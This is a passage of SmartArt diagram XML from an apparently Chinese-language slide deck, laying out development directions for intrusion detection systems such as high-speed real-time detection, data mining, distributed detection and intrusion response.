    <dgm:cxn modelId="{457E44AF-C15C-457D-B1E3-7F05654B6265}" type="presParOf" srcId="{EBFCF893-E77B-4042-9457-78290F36F9E8}" destId="{60056BF4-C331-4906-87AD-6742D94A9203}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{D649A6E9-9951-40BE-B9FA-9669526CD339}" type="presParOf" srcId="{94467064-0AA7-40A4-820E-1EDBC76CAD69}" destId="{236A1410-FCEF-42A3-B70B-CB7FDF3E056E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{82BEEDC2-43F7-455E-8CE2-E4090A4EF424}" type="presParOf" srcId="{920F5DB0-D0A3-4531-BBE3-E9EF47AA0D0C}" destId="{BD0C8646-58AF-4BF2-AF58-C33831BEB8BC}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{2849B7E6-C137-4BE1-8C48-B3F62911D8B7}" type="presParOf" srcId="{920F5DB0-D0A3-4531-BBE3-E9EF47AA0D0C}" destId="{AC297558-C0C2-49C6-965B-81CFD6F9D874}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{569D00C7-7368-41EC-88DA-40E6E0102CCA}" type="presParOf" srcId="{AC297558-C0C2-49C6-965B-81CFD6F9D874}" destId="{77ACC8C2-FBBC-44BD-B550-C5FD843255BA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{51E65B15-B63D-458D-AD27-862EDC1B3278}" type="presParOf" srcId="{77ACC8C2-FBBC-44BD-B550-C5FD843255BA}" destId="{E2FEE80E-66FF-4C35-9F5F-579399B41B8A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{FE66B510-2BF3-4F25-899F-934A478A14FE}" type="presParOf" srcId="{77ACC8C2-FBBC-44BD-B550-C5FD843255BA}" destId="{8E0BFAAD-189D-4E90-813B-3DDAF13F11C1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{92EBE317-F2B0-4EFE-8688-D833DE8BC31D}" type="presParOf" srcId="{AC297558-C0C2-49C6-965B-81CFD6F9D874}" destId="{C1465545-F05D-4F8F-BC02-AABC4FEFC1B4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{64B8DD2B-4B38-48A0-A979-353ADFF2EBAB}" type="presParOf" srcId="{920F5DB0-D0A3-4531-BBE3-E9EF47AA0D0C}" destId="{0BA44529-A63A-4BFE-885E-0F789876865A}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{76C967F9-B1A7-4571-933C-23CBA497EE35}" type="presParOf" srcId="{920F5DB0-D0A3-4531-BBE3-E9EF47AA0D0C}" destId="{444181FA-015C-4AEF-9D7E-FA949A7DB303}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{3479F753-0230-4E5F-A13E-7FECCB929452}" type="presParOf" srcId="{444181FA-015C-4AEF-9D7E-FA949A7DB303}" destId="{BF3EED2D-4E5D-43EA-B27D-C77BA1682A8B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{F1BF5A5C-339E-47DA-ABF9-88DC8005D2F1}" type="presParOf" srcId="{BF3EED2D-4E5D-43EA-B27D-C77BA1682A8B}" destId="{6CCEA0C0-3D06-472A-BEE2-FF3EC5601C1E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{41049715-0970-49F2-988C-6F59F0A046DB}" type="presParOf" srcId="{BF3EED2D-4E5D-43EA-B27D-C77BA1682A8B}" destId="{90F35A37-7713-4CF7-B2CB-0F0456BE3473}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{B59359E4-8AA6-4594-A26C-0E4DC6CA4156}" type="presParOf" srcId="{444181FA-015C-4AEF-9D7E-FA949A7DB303}" destId="{72A14F11-DC8F-42C3-9D25-D170C752528C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{DD9B5F26-6448-4404-854A-25996C3FF727}" type="presParOf" srcId="{72A14F11-DC8F-42C3-9D25-D170C752528C}" destId="{EDB14B5E-B143-469D-B57A-3D4C9C6A0F72}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{3E43D3A0-A5AA-4E70-A972-EFA63D6619DE}" type="presParOf" srcId="{72A14F11-DC8F-42C3-9D25-D170C752528C}" destId="{A684F204-0181-4BA4-83D3-582F2576F9E6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{126F0036-63E7-42D9-9695-F8B86ADECCAB}" type="presParOf" srcId="{A684F204-0181-4BA4-83D3-582F2576F9E6}" destId="{38FEF1D3-943C-4065-8500-296EAD24228F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{41BBB9CA-1799-4C37-9523-8A2F7B0D49F1}" type="presParOf" srcId="{38FEF1D3-943C-4065-8500-296EAD24228F}" destId="{8735EA6E-634C-4B55-9546-CCD011D8F79A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{7FC46F8B-3A9B-4328-B85B-C64772767FEC}" type="presParOf" srcId="{38FEF1D3-943C-4065-8500-296EAD24228F}" destId="{BE22EF32-2FBB-4A51-B07C-4A49E532EFE4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{EAB91809-4453-409E-B7BD-0D00DFEB2EBC}" type="presParOf" srcId="{A684F204-0181-4BA4-83D3-582F2576F9E6}" destId="{771474AC-83FF-4FD4-ACB0-E07CB0C23A0E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{8946FB2B-FAEC-4091-96B5-34F5E578824C}" type="presParOf" srcId="{72A14F11-DC8F-42C3-9D25-D170C752528C}" destId="{80F7C4EF-8F3A-48CE-AB84-80124D9B00B9}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{9288E459-4C48-419D-A3B1-274A4EE73D8B}" type="presParOf" srcId="{72A14F11-DC8F-42C3-9D25-D170C752528C}" destId="{4275440D-4656-4901-BAB8-6B6A76EE6896}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{4F443A27-4B81-49B6-95DD-1AEEBC0AB279}" type="presParOf" srcId="{4275440D-4656-4901-BAB8-6B6A76EE6896}" destId="{F4B86DE9-4432-4C6B-891E-1E06158EAD68}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{C2891CDB-4F2B-47E6-B243-BAB46E38FAC3}" type="presParOf" srcId="{F4B86DE9-4432-4C6B-891E-1E06158EAD68}" destId="{1B2509AB-C8A8-4AC2-9180-FEA4B95F569F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{43758B4B-5E49-4C29-B8D7-C27E717F3203}" type="presParOf" srcId="{F4B86DE9-4432-4C6B-891E-1E06158EAD68}" destId="{E5DECAAF-6DCC-4271-8F2B-5385DBB0051D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{E2130C91-F559-4A6D-93C0-004AECF0E00A}" type="presParOf" srcId="{4275440D-4656-4901-BAB8-6B6A76EE6896}" destId="{D8E28FDE-6F46-4E6B-8A34-5DEDED4D903F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{BAB17CFD-5CFD-4062-A200-78EF574FCBF9}" type="presParOf" srcId="{72A14F11-DC8F-42C3-9D25-D170C752528C}" destId="{35F35AB2-1A65-439B-83FD-79C05CC52F85}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{BBABEAA5-4302-4172-9463-A2C9F1A5A689}" type="presParOf" srcId="{72A14F11-DC8F-42C3-9D25-D170C752528C}" destId="{BB00DC20-1831-47D9-9BB8-0E5E8F1ACCBC}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{377AA701-8235-41A4-83C3-35BDA5A293F9}" type="presParOf" srcId="{BB00DC20-1831-47D9-9BB8-0E5E8F1ACCBC}" destId="{38770135-A6E3-45DC-962C-4E15571A72E6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{3BB0B83B-272C-4DF3-835C-308567F7FA46}" type="presParOf" srcId="{38770135-A6E3-45DC-962C-4E15571A72E6}" destId="{EB315BF8-3204-43A5-8EBB-EF436E04DBE5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{DCEE556E-FEB7-488E-95B2-057BFD776739}" type="presParOf" srcId="{38770135-A6E3-45DC-962C-4E15571A72E6}" destId="{4AFB4A67-CE93-4C95-BB3A-A89D6498B235}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{542B7C62-CDFB-4115-B9C8-32EC3E143645}" type="presParOf" srcId="{BB00DC20-1831-47D9-9BB8-0E5E8F1ACCBC}" destId="{B983F678-2200-4258-B0C3-1A7FAFE75EE2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{94CD9BBC-6EB0-452D-921D-07F99CB0F848}" type="presParOf" srcId="{72A14F11-DC8F-42C3-9D25-D170C752528C}" destId="{70D98036-B49F-4963-A848-64D17059D048}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{AE91A179-80B6-4438-9042-B001ACAE1A33}" type="presParOf" srcId="{72A14F11-DC8F-42C3-9D25-D170C752528C}" destId="{F19FAEDD-4E9D-4153-A7A5-6EE29F10AAA3}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{E342C8F1-C84C-45AD-86B3-49ACEED8A12F}" type="presParOf" srcId="{F19FAEDD-4E9D-4153-A7A5-6EE29F10AAA3}" destId="{9F99ACB3-45D6-4647-BC4C-E7E67C34DE96}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{880E8CDD-77BD-452C-9C3C-641709DCA280}" type="presParOf" srcId="{9F99ACB3-45D6-4647-BC4C-E7E67C34DE96}" destId="{C5714384-3717-4B41-A36E-85AF272AFECC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{E69BC24F-34C1-494D-BD1D-E43B574A63E1}" type="presParOf" srcId="{9F99ACB3-45D6-4647-BC4C-E7E67C34DE96}" destId="{08536E6B-A2CD-4479-B2D6-E54A7DAE1A87}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{1D097965-07BF-4832-8DE8-AFA0BE6B480A}" type="presParOf" srcId="{F19FAEDD-4E9D-4153-A7A5-6EE29F10AAA3}" destId="{A4F1A43C-4925-44B1-8F1F-366567AC9D5F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{9B8EB412-442F-4A6C-B217-4822A9407E3E}" type="presParOf" srcId="{920F5DB0-D0A3-4531-BBE3-E9EF47AA0D0C}" destId="{CD49B43D-ABC7-46C8-82C3-681297B4C7DB}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{B5A0DA37-FEFC-4E9A-9296-D0EFBEFE824C}" type="presParOf" srcId="{920F5DB0-D0A3-4531-BBE3-E9EF47AA0D0C}" destId="{90C3334B-9946-4BCD-B4C7-4E33CBB961DA}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{5D95679E-6FDF-4539-892B-4B4132D86A88}" type="presParOf" srcId="{90C3334B-9946-4BCD-B4C7-4E33CBB961DA}" destId="{6B059E49-4EC0-4D47-A962-6422D730DB67}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{4FF4A4F9-23C2-4412-A774-041F08611B00}" type="presParOf" srcId="{6B059E49-4EC0-4D47-A962-6422D730DB67}" destId="{885F89CA-0414-4CE7-BA90-D0620FC91B24}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{FB57DF51-6D01-4A23-9289-0900A15B8F68}" type="presParOf" srcId="{6B059E49-4EC0-4D47-A962-6422D730DB67}" destId="{86CD2934-69D3-42E9-8472-75D517C29305}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1"/>
    <dgm:cxn modelId="{084C5A17-BD5B-4639-98CB-D0943166F2FC}" type="presParOf" srcId="{90C3334B-9946-4BCD-B4C7-4E33CBB961DA}" destId="{09CC2D1C-A5DC-4C8B-A577-3A692758381B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy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8EA6C-8CE3-4AFB-B15B-3D6E6E3D9D97}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1" loCatId="hierarchy" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1#4" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent0_1" csCatId="mainScheme" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4C08F03F-E496-45DE-BD41-EFBB13B813EE}">
      <dgm:prSet phldrT="[文本]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>IDS</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>的发展方向</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="0" i="0" baseline="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:effectLst/>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6BCDD91C-BA81-4333-AA0D-7410EE0AA8A9}" type="parTrans" cxnId="{0DC04CFA-8852-43F1-A9AF-CD6A7A8B064A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US">
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EAF0FDAF-6EB7-4EEF-9672-58018CE1CDB0}" type="sibTrans" cxnId="{0DC04CFA-8852-43F1-A9AF-CD6A7A8B064A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US">
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E4F85FED-DC97-4A16-ADBA-01746117A53D}">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mn-lt"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>宽带高速实时检测技术</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" baseline="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{63E2A71E-CA7D-4817-8634-BB59BACAB105}" type="parTrans" cxnId="{1CE56722-1B1E-46FB-96BB-C4C0D2F8A808}">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latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{458DEFDC-DDC3-462E-943B-1B859E8AEC04}" type="sibTrans" cxnId="{1CE56722-1B1E-46FB-96BB-C4C0D2F8A808}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US">
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{78418E4E-C82C-438F-B343-E98ADCEAE396}">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mn-lt"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>数据挖掘</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcAft>
              <a:spcPts val="0"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" sz="2100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>技术</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{04CBB856-B280-45D9-B4FB-5581734C89BA}" type="parTrans" cxnId="{872DB01F-8270-487D-809D-74052A706E6B}">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latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5366F848-6F6B-47C5-977C-263B52F6F640}" type="sibTrans" cxnId="{872DB01F-8270-487D-809D-74052A706E6B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US">
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{83CEAF30-2A2E-4B49-8A2E-A96309B1F3FD}">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mn-lt"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>更先进的</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcAft>
              <a:spcPts val="0"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" sz="2100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>检测算法</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F16A4F96-D9B6-43F0-A1B3-B978BB86476B}" type="parTrans" cxnId="{9C26913B-7B25-4782-850F-21ACF72A8590}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:ln w="50800">
          <a:solidFill>
            <a:srgbClr val="002060"/>
          </a:solidFill>
        </a:ln>
        <a:effectLst>
          <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
            <a:prstClr val="black">
              <a:alpha val="40000"/>
            </a:prstClr>
          </a:outerShdw>
        </a:effectLst>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US">
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1BDEB7C2-4085-4463-878C-8223C18A9ED7}" type="sibTrans" cxnId="{9C26913B-7B25-4782-850F-21ACF72A8590}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US">
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4401475D-44F2-4BC0-93BA-42264B451FEE}">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mn-lt"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>大规模分布式检测技术</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" baseline="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BD13FD54-A0E0-4B11-AC18-3901602504E9}" type="sibTrans" cxnId="{D79A8EC3-C3DE-45D2-839C-8B1FA14FE06B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US">
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DBF6043E-6380-404B-B97A-F45A60A017EF}" type="parTrans" cxnId="{D79A8EC3-C3DE-45D2-839C-8B1FA14FE06B}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:ln w="50800">
          <a:solidFill>
            <a:srgbClr val="002060"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US">
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{910359DB-6C70-4091-A963-6CDC2106C3AF}">
      <dgm:prSet phldrT="[文本]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="002060"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcAft>
              <a:spcPts val="0"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" sz="2100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>入侵响应</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcAft>
              <a:spcPts val="0"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" sz="2100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>技术</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{20003E0B-7CB9-411F-B0D2-4A2D8D67006C}" type="parTrans" cxnId="{ED37058A-1D43-4858-9025-BEB542AD852F}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:ln w="50800">
          <a:solidFill>
            <a:srgbClr val="002060"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US">
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
